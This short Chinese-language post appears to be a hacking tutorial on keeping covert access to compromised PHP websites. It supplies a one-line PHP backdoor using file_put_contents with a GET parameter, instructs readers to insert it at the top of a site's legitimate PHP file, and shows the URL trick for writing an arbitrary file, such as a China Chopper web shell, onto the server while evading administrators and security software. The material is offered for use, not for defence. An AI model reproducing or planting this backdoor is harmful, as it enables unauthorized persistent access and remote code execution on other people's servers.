PHP_GET后门,躲避任何安全软件
经常拿到一些比较好的php站想要留住。插入菜刀一句话,很容易被管理发现,不管是eval还是assert,就是管理发现不了,有时连接也会被各种的安全软件拦截。
现在教大家一个简单的技巧。本人一直在用,留的后门没有被删过了。
<?php
file_put_contents('xpxp.php',"$_GET[uname]"); //此段代码插入它正常的PHP里面,最好插头部。
复制代码利用也很简单,在插入的PHP文件的后面加入get传参,
http://xxxxxxx.com/xxx.php?uname=插入内容,随便放,可以放一句话或者神马的,发挥自己想象了。
执行以后在插入的PHP当前文件夹下面生成一个xpxp.php 。